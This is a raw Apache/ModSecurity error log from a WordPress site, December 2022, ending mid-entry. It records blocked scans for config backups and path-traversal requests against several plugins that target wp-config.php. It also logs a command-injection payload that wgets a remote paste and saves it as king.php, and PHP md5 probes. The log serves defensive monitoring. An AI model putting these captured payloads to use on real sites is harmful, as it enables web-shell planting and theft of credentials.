[tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.conf"] [unique_id "Y4tTjSgq0fMxkP6FWyjCVgAAAJU"] [Sat Dec 03 08:48:00.846537 2022] [:error] [pid 30729:tid 140632513238784] [client 3.236.147.46:56746] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "Y4tTkCgq0fMxkP6FWyjCWAAAAJM"] [Sat Dec 03 08:48:01.500839 2022] [:error] [pid 30729:tid 140632647522048] [client 3.236.147.46:56750] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Y4tTkSgq0fMxkP6FWyjCWgAAAIM"] [Sat Dec 03 16:04:08.234701 2022] [:error] [pid 30728:tid 140632555202304] [client 5.188.62.140:46336] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4u5yNViFbyKSB92lNWrQQAAAE4"] [Sun Dec 04 03:07:25.722238 2022] [ssl:warn] [pid 32239:tid 140134753617792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 04 03:07:25.857310 2022] [ssl:warn] [pid 32240:tid 140134753617792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 04 03:07:26.273282 2022] [ssl:warn] [pid 32240:tid 140134753617792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 04 03:07:27.729662 2022] [ssl:warn] [pid 32240:tid 140134753617792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 04 03:07:30.010489 2022] [ssl:warn] [pid 32659:tid 140553043244928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 04 03:07:30.135553 2022] [ssl:warn] [pid 32660:tid 140553043244928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 04 05:28:32.925958 2022] [:error] [pid 32680:tid 140552645330688] [client 5.188.62.140:51968] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4x2UBMSDSzJbFsdx_2kxwAAABE"] [Sun Dec 04 09:35:35.379659 2022] [autoindex:error] [pid 32681:tid 140552586581760] [client 92.205.56.212:57892] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Dec 04 12:07:42.622704 2022] [:error] [pid 32680:tid 140552662116096] [client 5.188.62.26:60876] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4zT3hMSDSzJbFsdx_2mNgAAAA8"] [Sun Dec 04 13:32:49.269943 2022] [autoindex:error] [pid 543:tid 140552603367168] [client 43.130.71.239:34236] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Dec 04 22:11:53.003608 2022] [:error] [pid 32681:tid 140552720865024] [client 5.75.225.88:44702] [client 5.75.225.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y41heXlLvIAqQBR0B1DIZwAAAEg"], referer: www.google.com [Sun Dec 04 22:11:53.247251 2022] [:error] [pid 32680:tid 140552645330688] [client 5.75.225.88:44704] [client 5.75.225.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y41heRMSDSzJbFsdx_2oVwAAABE"], referer: www.google.com [Mon Dec 05 03:33:26.819194 2022] [ssl:warn] [pid 10465:tid 140121113958272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 05 03:33:26.951946 2022] [ssl:warn] [pid 10466:tid 140121113958272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 05 03:33:27.331956 2022] [ssl:warn] [pid 10466:tid 140121113958272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 05 03:33:29.359125 2022] [ssl:warn] [pid 10466:tid 140121113958272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 05 03:33:31.622566 2022] [ssl:warn] [pid 10884:tid 140206711465856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 05 03:33:31.745893 2022] [ssl:warn] [pid 10885:tid 140206711465856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 05 04:38:30.418639 2022] [:error] [pid 11536:tid 140206455912192] [client 5.188.62.26:52950] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y428FnQ6wtsgvlM2zuH_OAAAAMA"] [Mon Dec 05 05:10:40.630815 2022] [:error] [pid 11536:tid 140206279665408] [client 35.90.143.38:59724] [client 35.90.143.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y43DoHQ6wtsgvlM2zuECmQAAANU"] [Mon Dec 05 05:11:22.102666 2022] [:error] [pid 10907:tid 140206413948672] [client 35.90.143.38:59856] [client 35.90.143.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y43DyoxO90rFntiMB7-9JgAAAIU"] [Mon Dec 05 05:11:44.976902 2022] [:error] [pid 10905:tid 140206254487296] [client 35.90.143.38:59924] [client 35.90.143.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Y43D4OFqX1ISMvIkymKStAAAABg"] [Mon Dec 05 05:11:45.066456 2022] [:error] [pid 10906:tid 140206413948672] [client 35.90.143.38:59926] [client 35.90.143.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Y43D4UN1F9XDnIN63jfnawAAAEU"] [Mon Dec 05 05:11:45.920778 2022] [:error] [pid 10906:tid 140206430734080] [client 35.90.143.38:59930] [client 35.90.143.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "Y43D4UN1F9XDnIN63jfnbQAAAEM"] [Mon Dec 05 05:11:46.011039 2022] [:error] [pid 11536:tid 140206262880000] [client 35.90.143.38:59932] [client 35.90.143.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.conf"] [unique_id "Y43D4nQ6wtsgvlM2zuECwAAAANc"] [Mon Dec 05 05:11:49.505234 2022] [:error] [pid 11536:tid 140206430734080] [client 35.90.143.38:59944] [client 35.90.143.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "Y43D5XQ6wtsgvlM2zuECwgAAAMM"] [Mon Dec 05 05:11:50.478266 2022] [:error] [pid 11536:tid 140206254487296] [client 35.90.143.38:59948] [client 35.90.143.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Y43D5nQ6wtsgvlM2zuECwwAAANg"] [Mon Dec 05 09:12:24.505710 2022] [autoindex:error] [pid 11536:tid 140206330021632] [client 43.130.100.27:45286] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Dec 05 12:46:01.120996 2022] [:error] [pid 10907:tid 140206422341376] [client 14.63.221.211:51768] [client 14.63.221.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Y44uWYxO90rFntiMB7_A_wAAAIQ"] [Mon Dec 05 12:50:26.857913 2022] [:error] [pid 10905:tid 140206388770560] [client 67.205.56.207:52060] [client 67.205.56.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:cdshell. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:cdshell: die(md5(4565462));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/versions.php"] [unique_id "Y44vYuFqX1ISMvIkymKV8wAAAAg"], referer: investigacionperu.com [Mon Dec 05 18:04:38.745498 2022] [autoindex:error] [pid 10907:tid 140206346807040] [client 51.159.37.21:58680] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Dec 05 21:00:00.647670 2022] [:error] [pid 10905:tid 140206439126784] [client 5.75.225.88:33502] [client 5.75.225.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y46iIOFqX1ISMvIkymKXZAAAAAI"], referer: https://www.google.com [Mon Dec 05 21:00:01.878765 2022] [:error] [pid 10905:tid 140206321628928] [client 5.75.225.88:33504] [client 5.75.225.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y46iIeFqX1ISMvIkymKXZQAAABA"], referer: https://www.google.com [Mon Dec 05 21:00:03.092475 2022] [:error] [pid 10906:tid 140206330021632] [client 5.75.225.88:33506] [client 5.75.225.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: 